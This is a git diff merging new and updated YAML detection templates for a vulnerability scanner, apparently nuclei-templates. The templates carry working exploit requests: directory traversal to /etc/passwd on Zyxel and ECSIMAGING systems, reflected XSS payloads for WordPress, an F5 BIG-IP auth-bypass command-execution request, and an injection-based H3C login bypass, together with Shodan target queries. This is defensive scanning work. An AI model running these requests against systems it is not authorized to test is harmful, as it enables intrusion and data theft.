Merge branch 'projectdiscovery:master' into dashboard
commit
9c32a74548
|
@ -1,10 +1,19 @@
|
|||
cves/2018/CVE-2018-19326.yaml
|
||||
cves/2020/CVE-2020-36510.yaml
|
||||
cves/2022/CVE-2022-1040.yaml
|
||||
cves/2022/CVE-2022-1221.yaml
|
||||
cves/2022/CVE-2022-29548.yaml
|
||||
exposed-panels/privx-panel.yaml
|
||||
exposed-panels/umbraco-login.yaml
|
||||
exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml
|
||||
exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml
|
||||
exposures/configs/msmtp-config.yaml
|
||||
misconfiguration/unauthorized-h3csecparh-login.yaml
|
||||
technologies/cloudflare-nginx-detect.yaml
|
||||
technologies/dedecms-detect.yaml
|
||||
technologies/ecology-detect.yaml
|
||||
technologies/jspxcms-detect.yaml
|
||||
vulnerabilities/other/ecsimagingpacs-rce.yaml
|
||||
vulnerabilities/wordpress/age-gate-open-redirect.yaml
|
||||
vulnerabilities/wordpress/newsletter-manager-open-redirect.yaml
|
||||
vulnerabilities/wordpress/wp-security-open-redirect.yaml
|
||||
|
|
|
@ -11,6 +11,8 @@ info:
|
|||
classification:
|
||||
cve-id: CVE-2010-2861
|
||||
remediation: Upgrade to a supported version.
|
||||
metadata:
|
||||
shodan-query: http.component:"Adobe ColdFusion"
|
||||
tags: cve,cve2010,coldfusion,lfi,adobe
|
||||
|
||||
requests:
|
||||
|
|
|
@ -13,6 +13,8 @@ info:
|
|||
cvss-score: 9.8
|
||||
cve-id: CVE-2018-15961
|
||||
cwe-id: CWE-434
|
||||
metadata:
|
||||
shodan-query: http.component:"Adobe ColdFusion"
|
||||
tags: cve,cve2018,adobe,rce,coldfusion,fileupload
|
||||
|
||||
requests:
|
||||
|
|
|
@ -0,0 +1,37 @@
|
|||
id: CVE-2018-19326
|
||||
|
||||
info:
|
||||
name: Zyxel VMG1312-B10D 5.13AAXA.8 - Directory Traversal
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
description: The vulnerability exists due to path traversal, as demonstrated by reading /etc/passwd. A remote unauthenticated attacker can send a specially crafted URL request containing "dot dot" sequences (/../), conduct directory traversal attack and view arbitrary files.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/45904
|
||||
- https://www.cybersecurity-help.cz/vdb/SB2018120309
|
||||
- https://www.zyxel.com/homepage.shtml
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2018-19326
|
||||
cwe-id: CWE-22
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.html:"VMG1312-B10D"
|
||||
tags: cve,cve2018,zyxel,lfi,modem,router
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/../../../../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "application/octet-stream"
|
|
@ -0,0 +1,40 @@
|
|||
id: CVE-2020-36510
|
||||
|
||||
info:
|
||||
name: 15Zine < 3.3.0 - Reflected Cross-Site Scripting
|
||||
author: veshraj
|
||||
severity: medium
|
||||
description: |
|
||||
The theme does not sanitise and escape the cbi parameter before outputing it back in the response via the cb_s_a AJAX action, leading to a Reflected Cross-Site Scripting
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/d1dbc6d7-7488-40c2-bc38-0674ea5b3c95
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36510
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2020-36510
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: false
|
||||
tags: xss,wordpress,wp-theme,wp,cve,cve2020
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,37 @@
|
|||
id: CVE-2022-1221
|
||||
|
||||
info:
|
||||
name: Gwyn's Imagemap Selector <= 0.3.3 - Reflected Cross-Site Scripting
|
||||
author: veshraj
|
||||
severity: medium
|
||||
description: |
|
||||
The plugin does not sanitise and escape some parameters before outputting them back in attributes, leading to a Reflected Cross-Site Scripting.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/641be9f6-2f74-4386-b16e-4b9488f0d2a9
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1221
|
||||
metadata:
|
||||
verified: true
|
||||
tags: xss,wordpress,wp-plugin,wp,cve,cve2022
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1&class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script> popup-"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,18 +1,18 @@
|
|||
id: CVE-2022-1388
|
||||
|
||||
info:
|
||||
name: F5 BIG-IP iControl REST Auth Bypass RCE
|
||||
author: dwisiswant0
|
||||
name: F5 BIG-IP iControl - REST Auth Bypass RCE
|
||||
author: dwisiswant0,Ph33r
|
||||
severity: critical
|
||||
description: |
|
||||
This vulnerability may allow an unauthenticated attacker
|
||||
This F5 BIG-IP vulnerability can allow an unauthenticated attacker
|
||||
with network access to the BIG-IP system through the management
|
||||
port and/or self IP addresses to execute arbitrary system commands,
|
||||
create or delete files, or disable services. There is no data plane
|
||||
exposure; this is a control plane issue only.
|
||||
port and/or self IP addresses to execute arbitrary system commands.
|
||||
reference:
|
||||
- https://twitter.com/GossiTheDog/status/1523566937414193153
|
||||
- https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/
|
||||
- https://support.f5.com/csp/article/K23605346
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
|
@ -21,7 +21,7 @@ info:
|
|||
metadata:
|
||||
shodan-query: http.title:"BIG-IP®-+Redirect" +"Server"
|
||||
verified: true
|
||||
tags: bigip,cve,cve2022,rce,mirai
|
||||
tags: f5,bigip,cve,cve2022,rce,mirai
|
||||
|
||||
variables:
|
||||
auth: "admin:"
|
||||
|
@ -38,12 +38,32 @@ requests:
|
|||
|
||||
{
|
||||
"command": "run",
|
||||
"utilCmdArgs": "-c id"
|
||||
"utilCmdArgs": "-c '{{cmd}}'"
|
||||
}
|
||||
|
||||
- |
|
||||
POST /mgmt/tm/util/bash HTTP/1.1
|
||||
Host: localhost
|
||||
Connection: keep-alive, X-F5-Auth-Token
|
||||
X-F5-Auth-Token: a
|
||||
Authorization: Basic {{base64(auth)}}
|
||||
Content-Type: application/json
|
||||
|
||||
{
|
||||
"command": "run",
|
||||
"utilCmdArgs": "-c '{{cmd}}'"
|
||||
}
|
||||
|
||||
payloads:
|
||||
cmd:
|
||||
- 'echo CVE-2022-1388 | rev'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "commandResult"
|
||||
- "uid="
|
||||
- "8831-2202-EVC"
|
||||
condition: and
|
|
@ -26,7 +26,11 @@ requests:
|
|||
part: body
|
||||
words:
|
||||
- 'back<img src=x onerror=alert(document.domain)>'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -0,0 +1,28 @@
|
|||
id: zyxel-vmg1312b10d-login
|
||||
|
||||
info:
|
||||
name: ZYXEL VMG1312-B10D Login Detect
|
||||
author: princechaddha
|
||||
severity: info
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.html:"VMG1312-B10D"
|
||||
tags: tech,zyxel,modem,router
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "VMG1312-B10D"
|
||||
- "Welcome to the Web-Based Configurator"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 401
|
|
@ -0,0 +1,26 @@
|
|||
id: zyxel-vsg1432b101-login
|
||||
|
||||
info:
|
||||
name: ZYXEL VSG1432-B101 Login Detect
|
||||
author: princechaddha
|
||||
severity: info
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.html:"VSG1432-B101"
|
||||
tags: tech,zyxel,modem,router
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Welcome to ZyXEL VSG1432-B101::"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,30 @@
|
|||
id: unauthorized-h3csecparh-login
|
||||
|
||||
info:
|
||||
name: Unauthorized H3C Secparh Login
|
||||
author: ritikchaddha
|
||||
severity: high
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.html:"H3C-SecPath-运维审计系统"
|
||||
fofa-query: app="H3C-SecPath-运维审计系统" && body="2018"
|
||||
tags: h3c,default-login,unauth
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "admin"
|
||||
- "审计管理员"
|
||||
- "错误的id"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,28 @@
|
|||
id: cloudflare-nginx-detect
|
||||
|
||||
info:
|
||||
name: Cloudflare Nginx Detect
|
||||
author: idealphase
|
||||
severity: info
|
||||
reference:
|
||||
- https://blog.cloudflare.com/end-of-the-road-for-cloudflare-nginx/
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: product:"cloudflare-nginx"
|
||||
tags: cloudflare,nginx,tech
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "Server: cloudflare-nginx"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,31 @@
|
|||
id: dedecms-detect
|
||||
|
||||
info:
|
||||
name: DedeCMS Detect
|
||||
author: ritikchaddha
|
||||
severity: info
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"dedecms" || http.html:"power by dedecms"
|
||||
tags: dedecms,tech
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Power by DedeCms"
|
||||
- "DedeCMS演示站"
|
||||
- "DedeCMS"
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,26 @@
|
|||
id: ecsimagingpacs-rce
|
||||
|
||||
info:
|
||||
name: ECSIMAGING PACS 6.21.5 - Remote code execution
|
||||
author: ritikchaddha
|
||||
severity: critical
|
||||
description: ECSIMAGING PACS Application in 6.21.5 and bellow suffers from a OS Injection vulnerability. The parameter `file` on the webpage /showfile.php can be exploited with simple OS injection to gain root access. www-data user has sudo NOPASSWD access
|
||||
reference: https://www.exploit-db.com/exploits/49388
|
||||
metadata:
|
||||
verified: false
|
||||
tags: ecsimagingpacs,rce
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/showfile.php?file=/etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue